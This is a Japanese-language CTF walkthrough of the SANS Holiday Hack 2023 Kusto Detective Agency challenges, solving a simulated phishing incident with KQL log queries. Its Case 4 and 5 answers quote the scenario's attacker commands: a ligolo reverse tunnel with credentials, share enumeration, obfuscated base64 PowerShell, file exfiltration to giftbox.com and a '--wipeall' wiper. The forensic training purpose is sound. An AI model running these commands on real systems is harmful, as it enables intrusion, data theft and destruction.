Kusto Detective Agency SANS Holiday Hack 2023
Security インシデントっぽいシナリオでログから問題を解いていく系のチャレンジ
Onboarding: Welcome to SANS Holiday Hack 2023!
How many Craftperson Elf's are working from laptops?
Craftperson Elf is 何?となったが、Employees テーブルを見るとわかる。
Answer
Employees
| where role == "Craftsperson Elf"
| where hostname has "LAPTOP"
| count
Case 1: Welcome to Operation Giftwrap: Defending the Geese Island network
The alert says the user clicked the malicious link 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
What is the email address of the employee who received this phishing email?
What is the email address that was used to send this spear phishing email?
What was the subject line used in the spear phishing email?
結構そのままな感じ
Answer
Email
| where link == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
Case 2: Someone got phished! Let's dig deeper on the victim...
If the victim is someone important, our organization could be doomed! Hurry up, let's find out more about who was impacted!
What is the role of our victim in the organization?
What is the hostname of the victim's machine?
What is the source IP linked to the victim?
これも結構そのままな感じ
Answer
let recipientAddress = Email
| where link == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
| project recipient;
Employees
| where email_addr in(recipientAddress)
Case 3: That's not good. What happened next?
Use our various security log datasources to uncover more details about what happened to Alabaster.
What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!
What file is dropped to Alabaster's machine shortly after he downloads the malicious file?
Answer
OutboundNetworkEvents
| where url == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
| project timestamp
| extend binTimestamp = bin(timestamp,5m)
| join kind=inner( FileCreationEvents
| where hostname == "Y1US-DESKTOP"
| extend binTimestamp = bin(timestamp,5m)
) on binTimestamp
| where timestamp <= timestamp1
Case 4: A compromised host! Time for a deep dive.
Can you take a closer look at endpoint data from Alabaster's machine? We need to figure out exactly what happened here. Word of this hack is starting to spread to the other elves, so work quickly and quietly!
The attacker created an reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?
What is the timestamp when the attackers enumerated network shares on the machine?
What was the hostname of the system the attacker moved laterally to?
Answer
とりあえず Case 3 のタイムスタンプ以降の ProcessEvents を見てみる
ProcessEvents
| where hostname == "Y1US-DESKTOP"
| where timestamp >= datetime(2023-12-02T10:14:21Z)
あきらかに怪しいのが1つある
"ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof
ligolo は ポートフォワード用のツールっぽい。
https://github.com/sysdream/ligolo
Q1 はこれでよさそう
同じ parent_process_hash を持つ一覧を調べる
ProcessEvents
| where hostname == "Y1US-DESKTOP"
| where timestamp >= datetime(2023-12-02T10:14:21Z)
| where parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f"
Q2 enumerated network shares on the machine するにはどんなコマンドが必要か
net コマンドはいろいろできるらしい
parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f" の結果にはいろいろあるが 47 件なので目視で怪しそうなのをチェック
netstat
ipconfig
arp -a
netstat -an
nbtstat-n
net view /DOMAIN
net share
net use
net config
systeminfo
consent.exe 7196 426 0000028999E22E30
cmd.exe /C net use \\NorthPolefileshare\c$ /user:admin AdminPass123
Case 5: A hidden message
When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?
What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)
The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?
Answer
Case 4 の parent_process_hash から以下 3 つのコマンドが見つかる
2023-12-24T16:07:47Z cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn
2023-12-24T16:58:43Z cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4=
2023-12-25T10:44:27Z cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ=
それぞれ base64decode
print(base64_decode_tostring("KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"))
> ( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''
print(base64_decode_tostring("W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4="))
> [StRiNg]::JoIn( '', [ChaR[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))|& ((gv '*MDr*').NamE[3,11,2]-joiN
print(base64_decode_tostring("QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ="))
> C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$
1つ目のコマンドは、文字列が反転されてるっぽい。そのままコマンド実行しても反転したままだったので以下のように実施
2つ目のコマンドの前半をきれいにして実行してみる
[String]::JoIn( '', [Char[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))
downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file
Case 6: The final step!
We know that the attackers stole Santa's naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?
What is the name of the executable the attackers used in the final malicious command?
What was the command line flag used alongside this executable?
これは Case 5 の 3 つめのコマンドですでに確認できている
Answer
print(base64_decode_tostring("QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ="))
> C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$